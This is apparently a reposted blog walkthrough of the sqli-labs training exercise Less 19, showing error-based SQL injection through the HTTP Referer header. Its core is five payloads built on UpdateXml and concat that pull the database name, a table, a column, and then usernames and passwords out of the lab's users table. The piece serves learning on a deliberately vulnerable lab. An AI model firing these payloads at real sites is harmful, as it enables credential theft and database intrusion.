sqli-labs less19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

Posted superkrissv

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)相关的知识,希望对你有一定的参考价值。

技术分享图片

这个和less18一样,都是基于header的注入

这次的字段是referer

Referer: 123 AND UpdateXml(1,concat(0x7e,database(),0x7e),1),1)#

技术分享图片

技术分享图片

Referer: 123‘ AND UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),0x7e),1),1)#

技术分享图片

Referer: 123‘ AND UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 0,1),0x7e),1),1)#

技术分享图片

Referer: 123‘ AND UpdateXml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),1),1)#

技术分享图片

Referer: 123‘ AND UpdateXml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),1),1)#

技术分享图片

 

以上是关于sqli-labs less19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less11-12(post型union注入)

Sqli-Labs less17-19

sqli-labs less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)

sqli-labs less13 POST - Double Injection - Single quotes- String -twist (POST型单引号变形双注入)

sqli-labs less42 POST -Error based -String -Stacked(POST型基于错误的堆叠查询字符型注入)

sqli-labs less45 POST -Error based -String -Stacked Blind(POST型基于盲注的堆叠字符型注入)